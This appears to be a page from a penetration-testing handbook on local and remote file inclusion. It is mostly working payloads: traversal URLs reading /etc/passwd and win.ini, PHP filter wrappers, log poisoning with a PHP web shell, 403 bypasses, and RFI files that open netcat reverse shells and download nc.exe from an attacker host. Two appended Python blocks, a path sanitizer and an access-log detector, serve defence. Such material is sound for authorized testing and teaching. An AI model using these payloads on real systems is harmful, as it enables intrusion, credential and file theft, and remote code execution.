Pentest Book
LFI/RFI

Tools

```
# https://github.com/kurobeats/fimap
fimap -u "http://10.11.1.111/example.php?test="
# https://github.com/P0cL4bs/Kadimus
./kadimus -u localhost/?pg=contact -A my_user_agent
# https://github.com/wireghoul/dotdotpwn
dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
```
How to
    1. Look for requests whose parameters carry a filename, e.g. include=main.inc, template=/en/sidebar, file=foo/file1.txt
    2. Modify and test: file=foo/bar/../file1.txt
      1. If the response is the same, the parameter could be vulnerable
      2. If not, there is some kind of block or sanitizer
    3. Try to access world-readable files such as /etc/passwd or win.ini
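The sanitizer that step 2 is probing for, as an added example that is not part of the original page: a hypothetical resolve_include() for an include/template parameter that refuses stream wrappers, null bytes, encoded or Windows-style names and any path that resolves outside the template directory, so the foo/bar/../file1.txt probe gets a different response than foo/file1.txt.

```python
import os
import re
from typing import Optional

# Anything that starts with a scheme (php:, data:, expect:, file:, http:) is a stream wrapper, not a file name.
_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")
# Allowlist for a relative template name: letters, digits, "_", ".", "-" and "/" only,
# never starting with "." or "/", so "../", ".htaccess", "/etc/passwd" and "%2e" are all refused.
_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_./-]*$")


def resolve_include(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute file to include, or None when the request must be refused.

    base_dir and user_path are assumed values: the template directory and the raw
    (already URL-decoded by the web server) value of the include/template parameter.
    """
    if not user_path or "\x00" in user_path:       # null-byte truncation (file.txt%00)
        return None
    if _SCHEME_RE.match(user_path):                 # php://filter, data://, expect://, file://
        return None
    if "\\" in user_path:                           # Windows separators and \\host\share UNC paths
        return None
    if not _NAME_RE.match(user_path):               # %-encoding, ";", "~", leading "/" or "."
        return None
    if any(seg == ".." for seg in user_path.split("/")):   # defence in depth: blocks "foo/bar/../x"
        return None
    # Canonicalise both sides (follows symlinks) and require the target to stay under base_dir.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        return None
    return target
```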

LFI

```
# Basic LFI
curl -s http://10.11.1.111/gallery.php?page=/etc/passwd

# If LFI, also check
/var/run/secrets/kubernetes.io/serviceaccount

# PHP filter, base64-encoded output
http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php
# Null-byte ending
http://10.11.1.111/page=http://10.11.1.111/maliciousfile%00.txt
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00
# Other techniques
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd
https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd
https://abc.redact.com/asd.php?file:///etc/passwd%00
https://abc.redact.com/asd.php?file:///etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd%00.ext
https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd
https://target.com/admin..;/
https://target.com/../admin
https://target.com/whatever/..;/admin
https://target.com/whatever.php~
# Cookie based
GET /vulnerable.php HTTP/1.1
Cookie: usid=../../../../../../../../../../../../../etc/passwd
# LFI Windows
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini
http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini
http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext

# LFI using video upload:
https://github.com/FFmpeg/FFmpeg
https://hackerone.com/reports/226756
https://hackerone.com/reports/237381
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit
https://github.com/neex/ffmpeg-avi-m3u-xbin

# Contaminating log files
$ nc -v 10.11.1.111 80
10.11.1.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.1.111] 80 (http) open
<?php echo shell_exec($_GET['cmd']);?>
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig

# Common LFI to RCE:
Using file upload forms/functions
Using the PHP wrapper expect://command
Using the PHP wrapper php://file
Using the PHP wrapper php://filter
Using the PHP input stream php://input
Using data://text/plain;base64,command
Using /proc/self/environ
Using /proc/self/fd
Using log files with controllable input like:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail

# LFI possibilities by filetype
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS: HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / Blind XXE

# Chaining with other vulns
../../../tmp/lol.png -> for path traversal
sleep(10)-- -.jpg -> for SQL injection
<svg onload=alert(document.domain)>.jpg/png -> for XSS
; sleep 10; -> for command injection

# 403 bypasses
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
/secret/
/secret/.
//secret//
/./secret/..
/admin..;/
/admin%20/
/%20admin%20/
/admin%20/page
/%61dmin

# Path Bypasses
# 16-bit Unicode encoding
# double URL encoding
# overlong UTF-8 Unicode encoding
....//
....\/
..../\
....\\
```
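An added detection example, not part of the original page: it normalises request paths the way the Path Bypasses section above describes (double URL decoding, overlong UTF-8 and %uXXXX spellings of "." and "/", the "..;/" and "....//" forms, null bytes) and flags LFI/RFI probes in constructed Apache-style access-log lines; the log lines and signature names are made up for the example.

```python
import re
from urllib.parse import unquote

# Overlong UTF-8 and 16-bit (%uXXXX) spellings of ".", "/" and "\" that lenient decoders accept.
_ALT_ENCODINGS = {"%c0%ae": ".", "%u002e": ".", "%c0%af": "/", "%u002f": "/",
                  "%c1%9c": "\\", "%u005c": "\\"}

_SIGNATURES = [
    # "../", "..\", "....//" and Tomcat-style "..;/" all match this after normalisation
    ("path traversal", re.compile(r"\.{2,}(?:;+/|[/\\])")),
    ("null-byte truncation", re.compile("\x00")),
    ("php stream wrapper", re.compile(r"\b(?:php|data|expect|phar|zip)://")),
    ("remote include", re.compile(r"=(?:https?|ftp)://")),
    ("sensitive file", re.compile(r"/etc/passwd|/proc/self/|boot\.ini|win\.ini|serviceaccount")),
]


def normalize(raw: str) -> str:
    """Lower-case, map alternate encodings and URL-decode until stable (max 3 rounds)."""
    s = raw
    for _ in range(3):
        step = s.lower()
        for enc, ch in _ALT_ENCODINGS.items():
            step = step.replace(enc, ch)
        step = unquote(step)  # "%252e" -> "%2e" -> "." over successive rounds
        if step == s:
            break
        s = step
    return s


def scan_access_log(lines):
    """Return [(raw_request_path, [matched signature names])] for suspicious requests."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|HEAD)\s+(\S+)', line)  # combined log format
        if m:
            found = [name for name, rx in _SIGNATURES if rx.search(normalize(m.group(1)))]
            if found:
                hits.append((m.group(1), found))
    return hits


# Constructed sample lines (not from a real server) exercising the encodings listed above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /gallery.php?page=/etc/passwd HTTP/1.1" 200 1223
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 4411
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 210
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /addguestbook.php?LANG=..%c0%af..%c0%afwindows/win.ini%00 HTTP/1.1" 200 300
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /whatever/..;/admin HTTP/1.1" 200 500
10.0.0.6 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 980
"""
```

scan_access_log(SAMPLE_LOG.splitlines()) flags the first five lines and leaves the plain page=about request alone; note that a single unquote() would miss the %252e line entirely.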

RFI

```
# RFI:
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
Content of evil.txt:
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
# RFI over SMB (Windows)
cat php_cmd.php
<?php echo shell_exec($_GET['cmd']);?>
# Start an SMB server on the attacker machine and put the script there
# Access it via browser (2-request attack):
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234

# Cross Content Hijacking:
https://github.com/nccgroup/CrossSiteContentHijacking
https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
http://50.56.33.56/blog/?p=242

# Encoding scripts in PNG IDAT chunk:
https://yqh.at/scripts_in_pngs.php
```